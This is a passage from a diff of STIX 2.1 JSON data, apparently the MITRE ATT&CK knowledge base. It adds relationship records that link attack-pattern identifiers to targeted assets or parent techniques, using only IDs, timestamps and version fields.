"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7bbe6ac7-d0fb-40e4-8537-bdded7173f07", + "created": "2023-09-29T18:49:01.768Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:49:01.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7bc1d504-6425-4c48-8101-c4168213c300", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7bd46875-7d59-4d65-8f9b-d48d3cb54a84", + "created": "2023-09-28T20:07:15.553Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:07:15.553Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7bd65979-8ac6-47a9-969a-9e1d3e3c4dbe", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7be2d11d-87be-4d1c-8f5b-b7e59ad191ea", + "created": "2023-09-28T20:07:01.309Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:07:01.309Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7bf67f44-6349-4576-8145-44e53a91676a", + "created": "2020-03-11T14:58:52.196Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "target_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7c30237d-5d03-4f5f-9488-3629f2b1813c", + "created": "2022-08-22T20:42:08.635Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-08-22T20:42:08.635Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7c3535a5-53c2-4b85-aa15-a79b79bbbc85", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7c38f885-a9f0-4811-8907-baa7a4608d03", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7c433b29-0ad3-4574-990f-e3d6291e7f23", + "created": "2023-09-29T18:48:29.126Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:48:29.126Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7c6ec935-00e0-4697-978f-08fb1cdd1708", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7cb81e24-b3b8-4a56-b153-3247193de120", + "created": "2020-01-19T16:59:45.705Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", + "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7cbf31f4-a4d6-4000-953c-11ca039f6f33", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7cc668f7-4e85-4844-b994-dda2924e3174", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7cc9e8bf-8a63-4087-b517-ff2d0e67320a", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7cd00d93-860b-4138-98fc-162cb56a78dd", + "created": "2020-03-13T11:12:18.760Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7cf1506f-3064-4d8f-ac50-ff6b9a4fd3c3", + "created": "2020-12-17T02:14:34.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "target_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d0d99a9-d152-4c02-9fc8-730e57fe0fe1", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d12383e-f6b8-4d7f-8e82-41623df4e6e0", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d1ba641-0300-4f3e-99ab-880cf67e2709", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d244034-588d-4861-81ea-8c1db44f7055", + "created": "2020-01-24T14:17:44.082Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d2c58cd-87fa-4ae3-8132-989239d3a90b", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d42ba22-9595-4463-8dda-c0e47a154fed", + "created": "2023-09-28T20:07:48.301Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:07:48.301Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d4302d6-c7de-4eb1-88bf-902d0522f579", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d505b3b-db60-471d-8c62-155d4b91f067", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d5f5c79-438f-4d93-95c2-fc87d1a37f9c", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d7af1e8-0f9d-4abd-96a4-806c7786a687", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d80fede-7d79-483d-b5c8-627dac11fa50", + "created": "2024-06-27T09:25:16.995Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:25:16.995Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d8c3d33-941d-4654-b7f4-74381905c98d", + "created": "2020-01-28T17:05:15.051Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d9cf1cf-4228-48da-bc47-13064665924e", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7d9e1dda-b600-43ff-a8f0-d95e4c6818ec", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7dce3e3c-8876-4380-a165-efb225fbe0c0", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7dd11d5e-1c1c-4f94-b4bf-4fd59988539b", + "created": "2024-04-09T20:53:54.209Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:53:54.209Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7de4fc68-2202-4827-a55e-2c7fc0354afb", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7de93439-bf57-4d54-8f79-9287bf198894", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7dee3da3-7e24-4dc5-811f-61fad028560b", + "created": "2020-03-27T21:16:13.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7e0bc15f-1927-4c97-ac1b-f29ca97089c7", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--7e116526-31c0-403d-902b-48a749cddab8", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": 